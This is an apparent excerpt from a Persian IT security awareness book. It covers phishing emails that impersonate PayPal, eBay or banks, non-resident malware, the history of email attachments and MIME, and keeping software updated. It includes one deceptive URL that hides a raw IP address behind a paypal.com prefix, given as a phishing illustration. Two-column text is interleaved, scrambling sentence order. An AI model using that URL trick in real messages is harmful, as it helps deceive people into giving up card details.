‫ﺷﻮﻳﺪ ﻭ ﺷﻤﺎﺭﺓ ﻛﺎﺭﺕ ﺍﻋﺘﺒﺎﺭﻱ ﺧﻮﺩ ﺭﺍ ﻭﺍﺭﺩ ﻧﻤﺎﻳﻴﺪ‪ .‬ﺩﺭﻭﺍﻗﻊ ﺍﻳـﻦ‬
‫ﺑﺨﺶ ﺩﻭﻡ‬

‫‪٦٢‬‬
‫ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﻫﺮﮔﺰ ﺑﻪ ‪ PayPal‬ﻣﺘﺼﻞ ﻧﻤﻲﺷﻮﺩ‪ ،‬ﺑﻠﻜـﻪ ﻣﺘﻌﻠـﻖ‬ ‫ﺑﺪﺍﻓﺰﺍﺭﻫﺎﻱ ﻏﻴﺮﻣﺎﻧﺪﮔﺎﺭ‬
‫ﺑﻪ ﻓﺮﺩﻱ ﺍﺳﺖ ﻛﻪ ﺳﻌﻲ ﺩﺍﺭﺩ ﻛﺎﺭﺕ ﺍﻋﺘﺒﺎﺭﻱ ﺷﻤﺎ ﻭ ﺍﻃﻼﻋـﺎﺕ‬ ‫ﻫﻤﺔ ﺑﺪﺍﻓﺰﺍﺭﻫﺎ ﺭﻭﻱ ﺭﺍﻳﺎﻧﺔ ﺷﻤﺎ ﺍﺟﺮﺍ ﻧﻤﻲﺷﻮﻧﺪ‪ .‬ﺑﺴﻴﺎﺭ ﺭﺍﻳﺞ ﺷﺪﻩ‬
‫ﻣﺮﺑﻮﻁ ﺑﻪ ﺁﻧﺮﺍ ﺑﻪ ﺳﺮﻗﺖ ﺑﺒﺮﺩ‪ .‬ﺍﻳـﻦ ﺣﻴﻠـﻪﻫـﺎ ﺩﺭ ﻋﻤـﻞ ﺑـﺴﻴﺎﺭ‬ ‫ﻛﻪ ﺍﻳﻦ ﻧﺮﻡﺍﻓﺰﺍﺭﻫـﺎ ﻳـﻚ ﻧﺎﻣـﺔ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﺑﻔﺮﺳـﺘﻨﺪ ﻭ ﺩﺭ ﺁﻥ‬
‫ﻣﻮﻓﻘﻴﺖ ﺁﻣﻴـﺰ ﺑـﻮﺩﻩﺍﻧـﺪ‪ .‬ﺗﻮﺟـﻪ ﺩﺍﺷـﺘﻪ ﺑﺎﺷـﻴﺪ ﻛـﻪ ﻧﺎﻣـﻪﻫـﺎﻱ‬ ‫ﻛﺎﺭﺑﺮ ﺭﺍ ﺑﻪ ﻧﺤﻮﻱ ﺗﺮﻏﻴﺐ ﺑﻪ ﻣـﺸﺎﻫﺪﺓ ﭘﺎﻳﮕـﺎﻩ ﻭﺏ ﻣـﻮﺭﺩ ﻧﻈـﺮ‬
‫ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻣﺸﺎﺑﻪ ﻣﻤﻜﻦ ﺍﺳﺖ ﻧﺎﻣﻪﻫﺎﻱ ﺳﺎﻟﻢ ﻭ ﻣﺸﺮﻭﻉ ﺑﺎﺷﻨﺪ‬ ‫ﺧﻮﺩ ﻧﻤﺎﻳﻨﺪ‪ .‬ﺭﻭﺵ ﺳﻨﺘﻲ ﺣﻴﻠﻪ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﻧﺎﻣـﺔ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ‬
‫ﻛﻪ ﻭﺍﻗﻌﹰﺎ ﺍﺯ ﻃﺮﻑ ‪ PayPal‬ﺍﺭﺳﺎﻝ ﺷﺪﻩﺍﻧﺪ‪.‬‬ ‫ﺑﻪ ﺷﻤﺎ ﭼﻴﺰﻱ ﭘﻴﺸﻨﻬﺎﺩ ﻣﻲﺩﻫﺪ ﻛﻪ ﺑﺪﺍﻥ ﻋﻼﻗﻤﻨﺪ ﻫـﺴﺘﻴﺪ ﺍﻣـﺎ‬
‫ﻲ ﺭﺳﻤﻲ ﻛﻪ ﺑﺮﺍﻱ ﺍﻳﻦ ﻣﻨﻈﻮﺭ ﺍﺭﺳـﺎﻝ ﻣـﻲﺷـﻮﺩ‬ ‫ﻧﺎﻣﺔ ﺍﻟﻜﺘﺮﻭﻧﻴﻜ ﹺ‬ ‫ﻫﻨﮕﺎﻣﻴﻜﻪ ﻣﺸﻐﻮﻝ ﻣـﺸﺎﻫﺪﺓ ﭘﺎﻳﮕـﺎﻩ ﻭﺏ ﻣﻌﺮﻓـﻲﺷـﺪﻩ ﻫـﺴﺘﻴﺪ‬
‫ﻻ ﺷﺎﻣﻞ ﺍﻃﻼﻋﺎﺕ ﻣﻨﺤﺼﺮ ﺑﻪ ﻓﺮﺩﻱ ﺍﺳـﺖ ﻛـﻪ ﺍﺯ ﺁﺩﺭﺱ‬ ‫ﻣﻌﻤﻮ ﹰ‬ ‫ﺗﻌﺪﺍﺩﻱ ﻧﺮﻡﺍﻓﺰﺍﺭ ﻣﺨﺮﺏ ﺑﻪ ﺳﻴﺴﺘﻢ ﺷﻤﺎ ﺣﻤﻠﻪ ﻣﻲﻛﻨﻨﺪ ﻭ ﺷﺎﻳﺪ‬
‫ﭘﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺷﻤﺎ ﻧﻤﻲﺗﻮﺍﻥ ﺁﻧﻬﺎ ﺭﺍ ﺑﺪﺳﺖ ﺁﻭﺭﺩ؛ ﺍﻃﻼﻋﺎﺗﻲ‬ ‫ﻧﻮﻋﻲ ﻧـﺮﻡ ﺍﻓـﺰﺍﺭ ﺭﺍ ﺭﻭﻱ ﺳﻴـﺴﺘﻢ ‪ download‬ﻛـﺮﺩﻩ )ﻣـﺸﺎﺑﻪ‬
‫ﻧﻈﻴﺮ ﻧﺎﻡ ﻛﺎﻣﻞ ﻭ ﻳﺎ ﭼﻬﺎﺭ ﺭﻗﻢ ﺁﺧﺮ ﻛﺎﺭﺕ ﺍﻋﺘﺒـﺎﺭﻱ ﺷـﻤﺎ‪ .‬ﺍﮔـﺮ‬ ‫"ﻫﺪﺍﻳﺖ ﺑﻮﺳﻴﻠﻪ ‪download‬ﻫﺎ"( ﻭ ﻳﺎ ﻋﻤﻠﻴﺎﺕ ﺩﻳﮕﺮﻱ ﺍﻧﺠﺎﻡ ﺩﻫﻨﺪ‪.‬‬
‫ﺍﻳﻦ ﻧﺎﻣﺔ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺷﻤﺎ ﺭﺍ ﺑﻪ ﻳﻚ ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﻫﺪﺍﻳﺖ ﻛﻨﺪ‪ ،‬ﺑﻪ‬ ‫ﺩﺭ ﺭﻭﺷــﻬﺎﻱ ﺟﺪﻳــﺪﺗﺮ‪ ،‬ﻧﺎﻣــﺔ ﺍﻟﻜﺘﺮﻭﻧﻴﻜــﻲ ﺍﺩﻋــﺎ ﻣــﻲﻛﻨــﺪ ﻛــﻪ‬
‫ﺷﻤﺎ ﺁﺩﺭﺱ ﺁﻧﺮﺍ ﻧﻴﺰ ﺧﻮﺍﻫﺪ ﺩﺍﺩ‪ ،‬ﺍﻣﺎ ﺩﺭ ﺁﻥ ﻫﻴﭻ ﺍﺭﺗﺒـﺎﻁ ﺻـﻔﺤﻪ‬ ‫ﺻﻮﺭﺗﺤـــﺴﺎﺑﻲ ﺍﺯ ‪) eBay‬ﭘﺎﻳﮕـــﺎﻩ ﻭﺏ ﻣﺰﺍﻳـــﺪﻩ ﺩﺭ ﺍﻳﻨﺘﺮﻧـــﺖ( ﻳـــﺎ‬
‫ﻭﺏ‪ ٦٣‬ﻭﺟــﻮﺩ ﻧــﺪﺍﺭﺩ‪ .‬ﻫﻤﭽﻨــﻴﻦ ﺻــﻔﺤﺎﺕ ﻭﺏ ﻣﻘــﺼﺪ ﺷــﺎﻣﻞ‬ ‫‪) PayPal‬ﻳﻚ ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﺑﺮﺍﻱ ﭘﺮﺩﺍﺧﺘﻬﺎﻱ ﺍﻳﻨﺘﺮﻧﺘﻲ( ﻭ ﻳـﺎ ﺍﺯ ﻃـﺮﻑ‬
‫ﺍﻃﻼﻋﺎﺗﻲ ﻫـﺴﺘﻨﺪ ﻛـﻪ ﻫـﻴﭻ ﻛﻼﻫﺒـﺮﺩﺍﺭ ﻳـﺎ ﻫﺮﺯﻧﺎﻣـﻪﻧﻮﻳـﺴﻲ‬ ‫ﺑﺎﻧﻚ ﺷﻤﺎ ﺍﺳﺖ‪ .‬ﻧﺎﻣﺔ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺑﺴﻴﺎﺭ ﻣﻄﻤﺌﻦ ﺑﻨﻈﺮ ﻣﻲ ﺭﺳﺪ‬
‫ﻧﻤﻲﺗﻮﺍﻧﺪ ﺍﺯ ﺁﻥ ﺍﻃﻼﻉ ﺩﺍﺷﺘﻪﺑﺎﺷـﺪ‪ .‬ﺍﮔـﺮ ﺑـﺎﺯﻫﻢ ﺩﺭ ﺍﻳـﻦ ﻣـﻮﺭﺩ‬ ‫ﻭ ﺑﻪ ﺷﻤﺎ ﭘﺎﻳﮕﺎﻫﻬﺎﻱ ﻭﺑﻲ ﻧﺸﺎﻥ ﻣﻲﺩﻫﺪ ﻛﻪ ﺩﺭ ﺁﻧﻬﺎ ﻣﻲﺗﻮﺍﻧﻴـﺪ‬
‫ﺗﺮﺩﻳﺪ ﺩﺍﺷﺘﻴﺪ‪ ،‬ﺑﺮﺍﻱ ﻛﺴﺐ ﺍﻃﻤﻴﻨﺎﻥ ﺑﻴﺸﺘﺮ ﻣﻲ ﺗﻮﺍﻧﻴﺪ ﺍﺯ ﻃﺮﻳـﻖ‬ ‫ﻻ‬
‫ﺷﻤﺎﺭﺓ ﻛﺎﺭﺕ ﺍﻋﺘﺒﺎﺭﻱ ﺧـﻮﺩ ﺭﺍ ﺗـﺄﻣﻴﻦ ﺍﻋﺘﺒـﺎﺭ ﻧﻤﺎﻳﻴـﺪ‪ .‬ﻣﻌﻤـﻮ ﹰ‬
‫ﺗﻠﻔﻦ )ﻭ ﻧﻪ ﻧﺎﻣﺔ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ( ﺑﺎ ﺷﺮﻛﺖ ﻣﺮﺑﻮﻃﻪ ﺗﻤﺎﺱ ﺑﮕﻴﺮﻳﺪ ﻭ ﺍﺯ‬ ‫‪URL‬ﻫﺎﻳﻲ ﻛﻪ ﺍﻳﻦ ﻧﺎﻣﻪﻫﺎ ﻣﻌﺮﻓﻲ ﻣﻲﻛﻨﻨﺪ ﻧﻴﺰ ﺑـﺎ ‪URL‬ﻫـﺎﻱ‬
‫ﺍﺻﺎﻟﺖ ﻧﺎﻣﺔ ﺍﺭﺳﺎﻟﻲ ﻣﻄﻤﺌﻦ ﺷﻮﻳﺪ‪.‬‬ ‫ﻣﻌﺘﺒــﺮ ﺑــﺴﻴﺎﺭ ﻣــﺸﺎﺑﻬﺖ ﺩﺍﺭﺩ‪ .‬ﺑﻌﻨــﻮﺍﻥ ﻣﺜــﺎﻝ ‪ URL‬ﻭﺍﻗﻌــﻲ‬
‫‪ ،PayPal‬ﺁﺩﺭﺱ ‪ www.paypal.com‬ﺍﺳــﺖ‪ ،‬ﻭ ‪URL‬ﻱ‬
‫ﻛﻪ ﺩﺭ ﻧﺎﻣﻪ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻧﻤﺎﻳﺶ ﺩﺍﺩﻩ ﻣﻲﺷﻮﺩ ﻧﻴﺰ ﻣﻤﻜﻦ ﺍﺳـﺖ‬
‫ﺩﻗﻴﻘﹰﺎ ﻫﻤﺎﻥ ﺁﺩﺭﺱ ﺑﺎﺷﺪ‪ .‬ﺑﺎ ﺍﻳـﻦ ﻭﺟـﻮﺩ ﺁﻧﭽـﻪ ﻛـﻪ ﺩﺭ ﺻـﻔﺤﻪ‬
‫ﻧﺸﺎﻥ ﺩﺍﺩﻩ ﻣﻲﺷﻮﺩ‪ URL ،‬ﻭﺍﻗﻌﻲ ﻧﻴﺴﺖ ﻛﻪ ﺑﺮﺍﻱ ﺩﺳﺘﺮﺳﻲ ﺑﻪ‬
‫ﺁﻥ ﺻﻔﺤﻪ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﮔﺮﻓﺘﻪ ﺍﺳﺖ‪ URL .‬ﻭﺍﻗﻌﻲ ﻛﻪ ﺑﻪ‬
‫ﻻ ﭘﻨﻬﺎﻥ ﻣﻲﺑﺎﺷﺪ ﻭ ﻣﻤﻜﻦ ﺍﺳـﺖ ﺑـﺼﻮﺭﺕ‬ ‫ﺁﻥ ﺍﺷﺎﺭﻩ ﺷﺪ ﻣﻌﻤﻮ ﹰ‬
‫ﺯﻳﺮ ﺑﺎﺷﺪ‪:‬‬
‫‪http://www.paypal.com:user=3245329:transaction‬‬
‫‪=43293:code=4333033.33@218.5.79.162‬‬

‫‪63‬‬ ‫‪Hyperlink‬‬ ‫‪62‬‬ ‫‪Non-Resident Malware‬‬


‫‪٧٩‬‬ ‫ﺑﺨﺶ ﺩﻭﻡ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﮐﺎﺭﺑﺮﺍﻥ ﻣﻨﻔﺮﺩ‬

‫ﭘﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ‬

‫ﺳﻴﺮ ﺗﻜﺎﻣﻞ‬
‫ﺍﮔﺮ ﺗﺎﺭﻳﺨﭽﺔ ﺷـﺒﻜﻪ ﺭﺍ ﺑﺮﺭﺳـﻲ ﻛﻨﻴـﺪ )‪ ۱۰‬ﺗـﺎ ‪ ۳۰‬ﺳـﺎﻝ ﮔﺬﺷـﺘﻪ(‬
‫ﻣﺸﺎﻫﺪﻩ ﻣﻲﻛﻨﻴﺪ ﻛﻪ ﺩﺭ ﺍﺑﺘﺪﺍ ﺍﺯ ﭘﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﺗﻨﻬـﺎ ﺑـﺮﺍﻱ‬
‫ﻓﺼﻞ ﺷﺸﻢ‬
‫ﺍﺭﺳﺎﻝ ﭘﻴﺎﻣﻬﺎﻱ ﻣﺘﻨﻲ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﺷﺪ‪ .‬ﺍﻛﺜﺮ ﺳﻴﺴﺘﻤﻬﺎﻳﻲ ﻛـﻪ ﺍﺯ‬ ‫ﺍﻣﻨﻴﺖ ﺧﺪﻣﺎﺕ ﺷﺒﻜﻪ‬
‫ﭘﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﺮﺩﻧﺪ ﺍﺯ ﺭﻭﺷﻬﺎﻱ ﻣﺨﺘﻠﻔﻲ ﺑﺮﺍﻱ‬
‫ﺑﺨﺶ ﺩﻭﻡ‬

‫ﺍﻧﺘﻘﺎﻝ ﻓﺎﻳﻠﻬﺎ ﺑﻬﺮﻩ ﻣﻲﮔﺮﻓﺘﻨﺪ‪ .‬ﺭﻭﺷﻬﺎﻱ ﺍﻧﺘﻘﺎﻝ ﻓﺎﻳﻞ ﺗﺎ ﺣﺪﻭﺩﻱ‬ ‫ﻛﻠﻴﺎﺕ‬


‫ﻧﺎﻣﺄﻧﻮﺱ ﺑﻮﺩﻧﺪ ﻭ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺁﻧﻬﺎ ﺳﺨﺖ ﺑﻮﺩ‪ .‬ﺍﻟﺒﺘﻪ ﺩﺭ ﺍﻭﺍﻳﻞ ﻛﺎﺭ‬
‫ﻛﻪ ﺑﻴﺸﺘﺮ ﻛﺎﺭﺑﺮﺍﻥ ﭘﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻣﺘﺨﺼﺼﻴﻦ ﻓﻨﺎﻭﺭﻱ ﺑﻮﺩﻧﺪ‬ ‫ﭘﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻭ ﻭﺏ ﺍﺯ ﻛﺎﺭﺑﺮﺩﻫﺎﻱ ﺍﺻﻠﻲ ﺍﻳﻨﺘﺮﻧﺖ ﻫـﺴﺘﻨﺪ‪.‬‬
‫ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﭼﻨﺪﺍﻥ ﻣﻬـﻢ ﻧﺒـﻮﺩ‪ ،‬ﺍﻣـﺎ ﻫﻨﮕﺎﻣﻴﻜـﻪ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ﺁﻥ‬ ‫ﺩﺭ ﺍﻳﻦ ﻓﺼﻞ ﻋﻤﻠﻜﺮﺩ ﺍﻳـﻦ ﺧـﺪﻣﺎﺕ ﺭﺍ ﺑﻄـﻮﺭ ﺟﺰﺋـﻲ ﺗﻮﺿـﻴﺢ‬
‫ﻋﻤﻮﻡ ﮔﺴﺘﺮﺩﻩﺗﺮﻱ ﻳﺎﻓﺖ‪ ،‬ﺑﺎﻳـﺪ ﺑـﺮﺍﻱ ﺍﺳـﺘﻔﺎﺩﻩ ﺗﻮﺳـﻂ ﻋﻤـﻮﻡ‬ ‫ﻣﻲﺩﻫﻴﻢ ﻭ ﺍﺳﺘﻔﺎﺩﺓ ﻧﺎﻣﻨﺎﺳﺐ ﺍﺯ ﺁﻧﻬﺎ ﻛـﻪ ﺑﺎﻋـﺚ ﺍﻳﺠـﺎﺩ ﻧـﺎﺍﻣﻨﻲ‬
‫ﺳﺎﺩﻩﺗﺮ ﻣﻲﮔﺸﺖ‪.‬‬ ‫ﻣﻲﮔﺮﺩﺩ ﺭﺍ ﺑﺮﺭﺳﻲ ﻣﻲﻛﻨﻴﻢ‪ .‬ﻣﻮﺍﺭﺩﻱ ﻣﺜﻞ ﺍﺭﺗﺒﺎﻃﺎﺕ ﺑـﻲﺳـﻴﻢ‪،‬‬
‫ﺍﺷﺘﺮﺍﻙ ﻓﺎﻳﻠﻬﺎ ﻭ ﻗﺎﺑﻠﻴﺖ ﺍﺭﺳﺎﻝ ﭘﻴﺎﻡ ﻓﻮﺭﻱ ﺍﺯ ﺩﻳﮕﺮ ﻣﻮﺿـﻮﻋﺎﺕ‬
‫ﻣﺸﻜﻞ ﺍﻳﻦ ﺑﻮﺩ ﻛﻪ ﭘﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺍﻭﻟﻴﻪ ﺗﻨﻬﺎ ﺑـﺮﺍﻱ ﺍﻧﺘﻘـﺎﻝ‬
‫ﺣﺴﺎﺱ ﻣﺮﺗﺒﻂ ﺑﺎ ﺍﻣﻨﻴﺖ ﺷﺒﻜﻪ ﻫﺴﺘﻨﺪ ﻛﻪ ﺩﺭ ﺍﻳﻦ ﻓﺼﻞ ﺑﻪ ﺁﻧﻬﺎ‬
‫ﻣﺘﻨﻬﺎﻱ ﺳﺎﺩﻩ‪ ٦٤‬ﻃﺮﺍﺣﻲ ﺷﺪﻩ ﺑﻮﺩ ﻭ ﻓﺎﻳﻠﻬﺎﻳﻲ ﭼﻮﻥ ﺑﺮﻧﺎﻣﻪﻫـﺎﻱ‬
‫ﭘﺮﺩﺍﺧﺘﻪ ﺧﻮﺍﻫﺪ ﺷﺪ‪.‬‬
‫ﺍﺟﺮﺍﻳﻲ ﺩﺭ ﻣﺘﻦ ﺧﻮﺩ ﻛﺎﺭﺍﻛﺘﺮﻫﺎﻱ ﻏﻴﺮﭼﺎﭘﻲ ﺩﺍﺷﺘﻨﺪ ﻛﻪ ﺩﺭ ﻣﺘﻮﻥ‬
‫ﺳﺎﺩﻩ ﻗﺎﺑﻞ ﻧﻤﺎﻳﺶ ﻧﺒﻮﺩﻧـﺪ‪ .‬ﺭﺍﻩﺣـﻞ ﭘﻴـﺸﻨﻬﺎﺩﻱ ﺍﻳـﻦ ﺑـﻮﺩ ﻛـﻪ‬ ‫ﺍﺻﻮﻝ ﺍﻭﻟﻴﻪ‬
‫ﺍﻃﻼﻋﺎﺕ ﻏﻴﺮﭼﺎﭘﻲ ﺑﮕﻮﻧﻪﺍﻱ ﻛﺪﮔﺬﺍﺭﻱ ﺷﻮﻧﺪ ﻛﻪ ﺑﺘﻮﺍﻥ ﺁﻧﻬـﺎ ﺭﺍ‬
‫ﺩﺭ ﻣﺘﻮﻥ ﺳﺎﺩﻩ ﺑﻪ ﻧﻤﺎﻳﺶ ﺩﺭﺁﻭﺭﺩ )ﺟﺰﺋﻴﺎﺕ ﺑﻴﺸﺘﺮ ﺩﺭ ﻣﻮﺭﺩ ﻛﺪﮔـﺬﺍﺭﻱ‬
‫ﻭﺻﻠﻪ ﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺭﺍ ﺑﺎﻳﺪ ﺑﺼﻮﺭﺕ ﻣﻨﻈﻢ ﺑـﺮﺍﻱ ﻧـﺮﻡ ﺍﻓﺰﺍﺭﻫـﺎﻱ‬
‫ﺩﺭ ﺿﻤﻴﻤﺔ ‪ ۱‬ﺫﻛﺮ ﺷﺪﻩ ﺍﺳﺖ(‪ .‬ﺩﺭ ﺍﻳﻦ ﺭﻭﺵ ﺑﻌـﺪ ﺍﺯ ﺩﺭﻳﺎﻓـﺖ ﭘﻴـﺎﻡ‪،‬‬ ‫ﺧﻮﺩ ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻲ ﻛﻨﻴﺪ‪ .‬ﺍﺯ ﺁﻧﺠﺎ ﻛﻪ ﻣﺸﻜﻼﺕ ﺍﻣﻨﻴﺘﻲ ﻣﻲﺗﻮﺍﻧﻨـﺪ‬
‫ﻓﺎﻳﻞ ﻛﺪﮔﺬﺍﺭﻱﺷﺪﻩ ﻛﺪﮔﺸﺎﻳﻲ ﻣﻲﮔﺮﺩﺩ ﻭ ﺑﻪ ﺷﻜﻞ ﺍﺻﻠﻲ ﺧﻮﺩ‬ ‫ﺑﺎ ﺭﻭﺷﻬﺎﻱ ﻣﺘﻌﺪﺩﻱ ﺑﻪ ﺷـﻤﺎ ﺁﺳـﻴﺐ ﺑﺮﺳـﺎﻧﻨﺪ‪ ،‬ﻫﻨﮕﺎﻣﻴﻜـﻪ ﺑـﻪ‬
‫ﺩﺭ ﻣﻲﺁﻳﺪ‪.‬‬ ‫ﺍﻳﻨﺘﺮﻧﺖ ﻣﺘﺼﻞ ﻣﻲﺷﻮﻳﺪ ﺍﺣﺘﻤﺎﻝ ﺁﺳﻴﺐ ﭘﺬﻳﺮﻱ ﺑﻴﺸﺘﺮ ﻣﻲﮔﺮﺩﺩ‪.‬‬
‫ﺍﮔﺮ ﺩﺭ ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ﻳﺎ ﻧﺮﻡﺍﻓﺰﺍﺭ ﻛﺎﺭﺑﺮﺩﻱ ﺷﻤﺎ ﺍﺷـﻜﺎﻝ ﺍﻣﻨﻴﺘـﻲ‬
‫ﺑﻌﺪ ﺍﺯ ﺁﻥ ﻣﻔﻬﻮﻡ "ﺿﻤﻴﻤﻪ" ﺑﻮﺟﻮﺩ ﺁﻣﺪ ﺗﺎ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺁﻥ ﺑﺘﻮﺍﻥ‬ ‫ﻭﺟﻮﺩ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ ﻣﻄﻤﺌﻦ ﺑﺎﺷﻴﺪ ﻣﻬﺎﺟﻤﻴﻦ ﺍﺯ ﺁﻥ ﺍﻃﻼﻉ ﺩﺍﺭﻧـﺪ‬
‫ﺵ‬
‫ﺍﻧﻮﺍﻉ ﺑﻴﺸﺘﺮﻱ ﺍﺯ ﻓﺎﻳﻠﻬﺎ ﺭﺍ ﻛﺪﮔﺬﺍﺭﻱ ﻧﻤـﻮﺩ‪ .‬ﺍﻣـﺮﻭﺯﻩ ﺍﻳـﻦ ﺭﻭ ﹺ‬ ‫ﻭ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺁﻥ ﺭﻭﺷﻬﺎﻳﻲ ﺑﺮﺍﻱ ﻧﻔﻮﺫ ﺑﻪ ﺭﺍﻳﺎﻧﺔ ﺷـﻤﺎ ﻃﺮﺍﺣـﻲ‬
‫ﺟﺪﻳﺪ ‪ ٦٥MIME‬ﻧﺎﻣﻴﺪﻩ ﻣﻲﺷـﻮﺩ‪ .‬ﻫﻨﮕﺎﻣﻴﻜـﻪ ﻛـﺎﺭﺑﺮﺩ ﺿـﻤﻴﻤﻪ‬ ‫ﻣﻲﻛﻨﻨﺪ‪.‬‬
‫ﻭﺳﻌﺖ ﺑﻴﺸﺘﺮﻱ ﭘﻴﺪﺍ ﻛﺮﺩ‪ ،‬ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﭘﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻃﻮﺭﻱ‬
‫ﺗﻐﻴﻴﺮ ﻛﺮﺩﻧﺪ ﻛﻪ ﺑﺘﻮﺍﻧﻨـﺪ ﺿـﻤﺎﻳﻢ ﺭﺍ ﺑﻄـﻮﺭ ﺧﻮﺩﻛـﺎﺭ ﺑـﺎﺯ ﻛﻨﻨـﺪ‪.‬‬ ‫ﻗﺎﻧﻮﻥ ﭼﻬﺎﺭﻡ‪:‬‬
‫ﺑﻨﺎﺑﺮﺍﻳﻦ ﺩﺭﻳﺎﻓﺖﻛﻨﻨﺪﺓ ﭘﻴﺎﻡ ﻣﻲﺗﻮﺍﻧﺴﺖ ﺁﻧﭽﻪ ﺑﺮﺍﻱ ﻭﻱ ﻓﺮﺳﺘﺎﺩﻩ‬ ‫ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ﻭ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﻛﺎﺭﺑﺮﺩﻱ ﻣﻬﻢ ﺧـﻮﺩ ﺭﺍ‬
‫ﺷﺪﻩ ﺍﺳﺖ ﺭﺍ ﺑﺪﻭﻥ ﺍﻧﺠﺎﻡ ﻓﻌﺎﻟﻴﺖ ﺍﺿﺎﻓﻪ ﻣﺸﺎﻫﺪﻩ ﻧﻤﺎﻳﺪ‪.‬‬ ‫ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻲ ﻛﻨﻴﺪ‪.‬‬
‫ﺩﺭ ﻫﻤﺎﻥ ﺯﻣﺎﻥ ﺷﺒﻜﻪ ﮔـﺴﺘﺮﺩﻩ ﺟﻬـﺎﻧﻲ ﻧﻴـﺰ ﻣﺮﺳـﻮﻡ ﺷـﺪ ﻭ ﺍﺯ‬ ‫ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻲ ﺍﻟﺰﺍﻣﹰﺎ ﺑﻪ ﻣﻌﻨﺎﻱ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺁﺧﺮﻳﻦ ﻧﺴﺨﻪﻫﺎ ﻧﻴﺴﺖ‪.‬‬
‫‪ HTML‬ﺑﺮﺍﻱ ﻗﺎﻟﺐﺑﻨﺪﻱ ﺻﻔﺤﺎﺕ ﻭﺏ ﺑﻬﺮﻩ ﮔﺮﻓـﺖ‪HTML .‬‬ ‫ﺑﻴﺸﺘﺮ ﺷﺮﻛﺘﻬﺎ ﻭ ﺗﻮﺳﻌﻪﺩﻫﻨﺪﮔﺎﻥ‪ ،‬ﺍﺷﻜﺎﻻﺕ ﺍﻣﻨﻴﺘﻲ ﻧﺴﺨﻪﻫـﺎﻱ‬
‫ﺗﺒﺪﻳﻞ ﺑﻪ ﻳﻜﻲ ﺍﺯ ﺭﻭﺷﻬﺎﻱ ﻛﺪﮔﺬﺍﺭﻱ ‪ MIME‬ﺷﺪ ﻛـﻪ ﺍﻣﻜـﺎﻥ‬ ‫ﺭﺍﻳﺞ ﺭﺍ ﺑﺮﻃﺮﻑ ﻣﻲﻛﻨﻨﺪ‪ .‬ﺗﻮﺟﻪ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﻛﻪ ﺍﻳﻦ ﻣـﺴﺌﻠﻪ ﺩﺭ‬
‫ﻗﺎﻟﺐﺑﻨﺪﻱ ﻧﺎﻣﻪﻫﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺭﺍ ﻓﺮﺍﻫﻢ ﻣﻲﻛﺮﺩ )ﺗﻐﻴﻴﺮ ﻓﻮﻧﺖﻫﺎ‪،‬‬ ‫ﻻ ﻓﻘــﻂ ﺑــﺮﺍﻱ ﺁﺧــﺮﻳﻦ‬
‫ﻣــﻮﺭﺩ ﻧــﺮﻡﺍﻓﺰﺍﺭﻫــﺎﻱ ﺭﺍﻳﮕــﺎﻥ ﻣﻌﻤــﻮ ﹰ‬
‫ﺭﻧﮕﻬــﺎ‪ ،‬ﺗــﺼﺎﻭﻳﺮ‪ ،‬ﻭ ﺍﺷــﺎﺭﻩﮔﺮﻫــﺎ ﺑــﻪ ﺻــﻔﺤﺎﺕ ﻭﺏ(‪ .‬ﺩﺭﺣــﺎﻝ ﺣﺎﺿــﺮ‬ ‫ﻧﺴﺨﻪﻫﺎﻱ ﻣﻮﺟﻮﺩ ﺻﺎﺩﻕ ﺍﺳﺖ‪ .‬ﺍﻳﻦ ﺑـﺪﺍﻥ ﻣﻌﻨﺎﺳـﺖ ﻛـﻪ ﺍﮔـﺮ‬
‫ﻣﻲﺧﻮﺍﻫﻴﺪ ﺍﺯ ﺍﺷﻜﺎﻻﺕ ﺍﻣﻨﻴﺘﻲ ﻣﺼﻮﻥ ﺑﻤﺎﻧﻴﺪ ﺑﺎﻳﺪ ﺑﻄﻮﺭ ﻣـﻨﻈﻢ‬
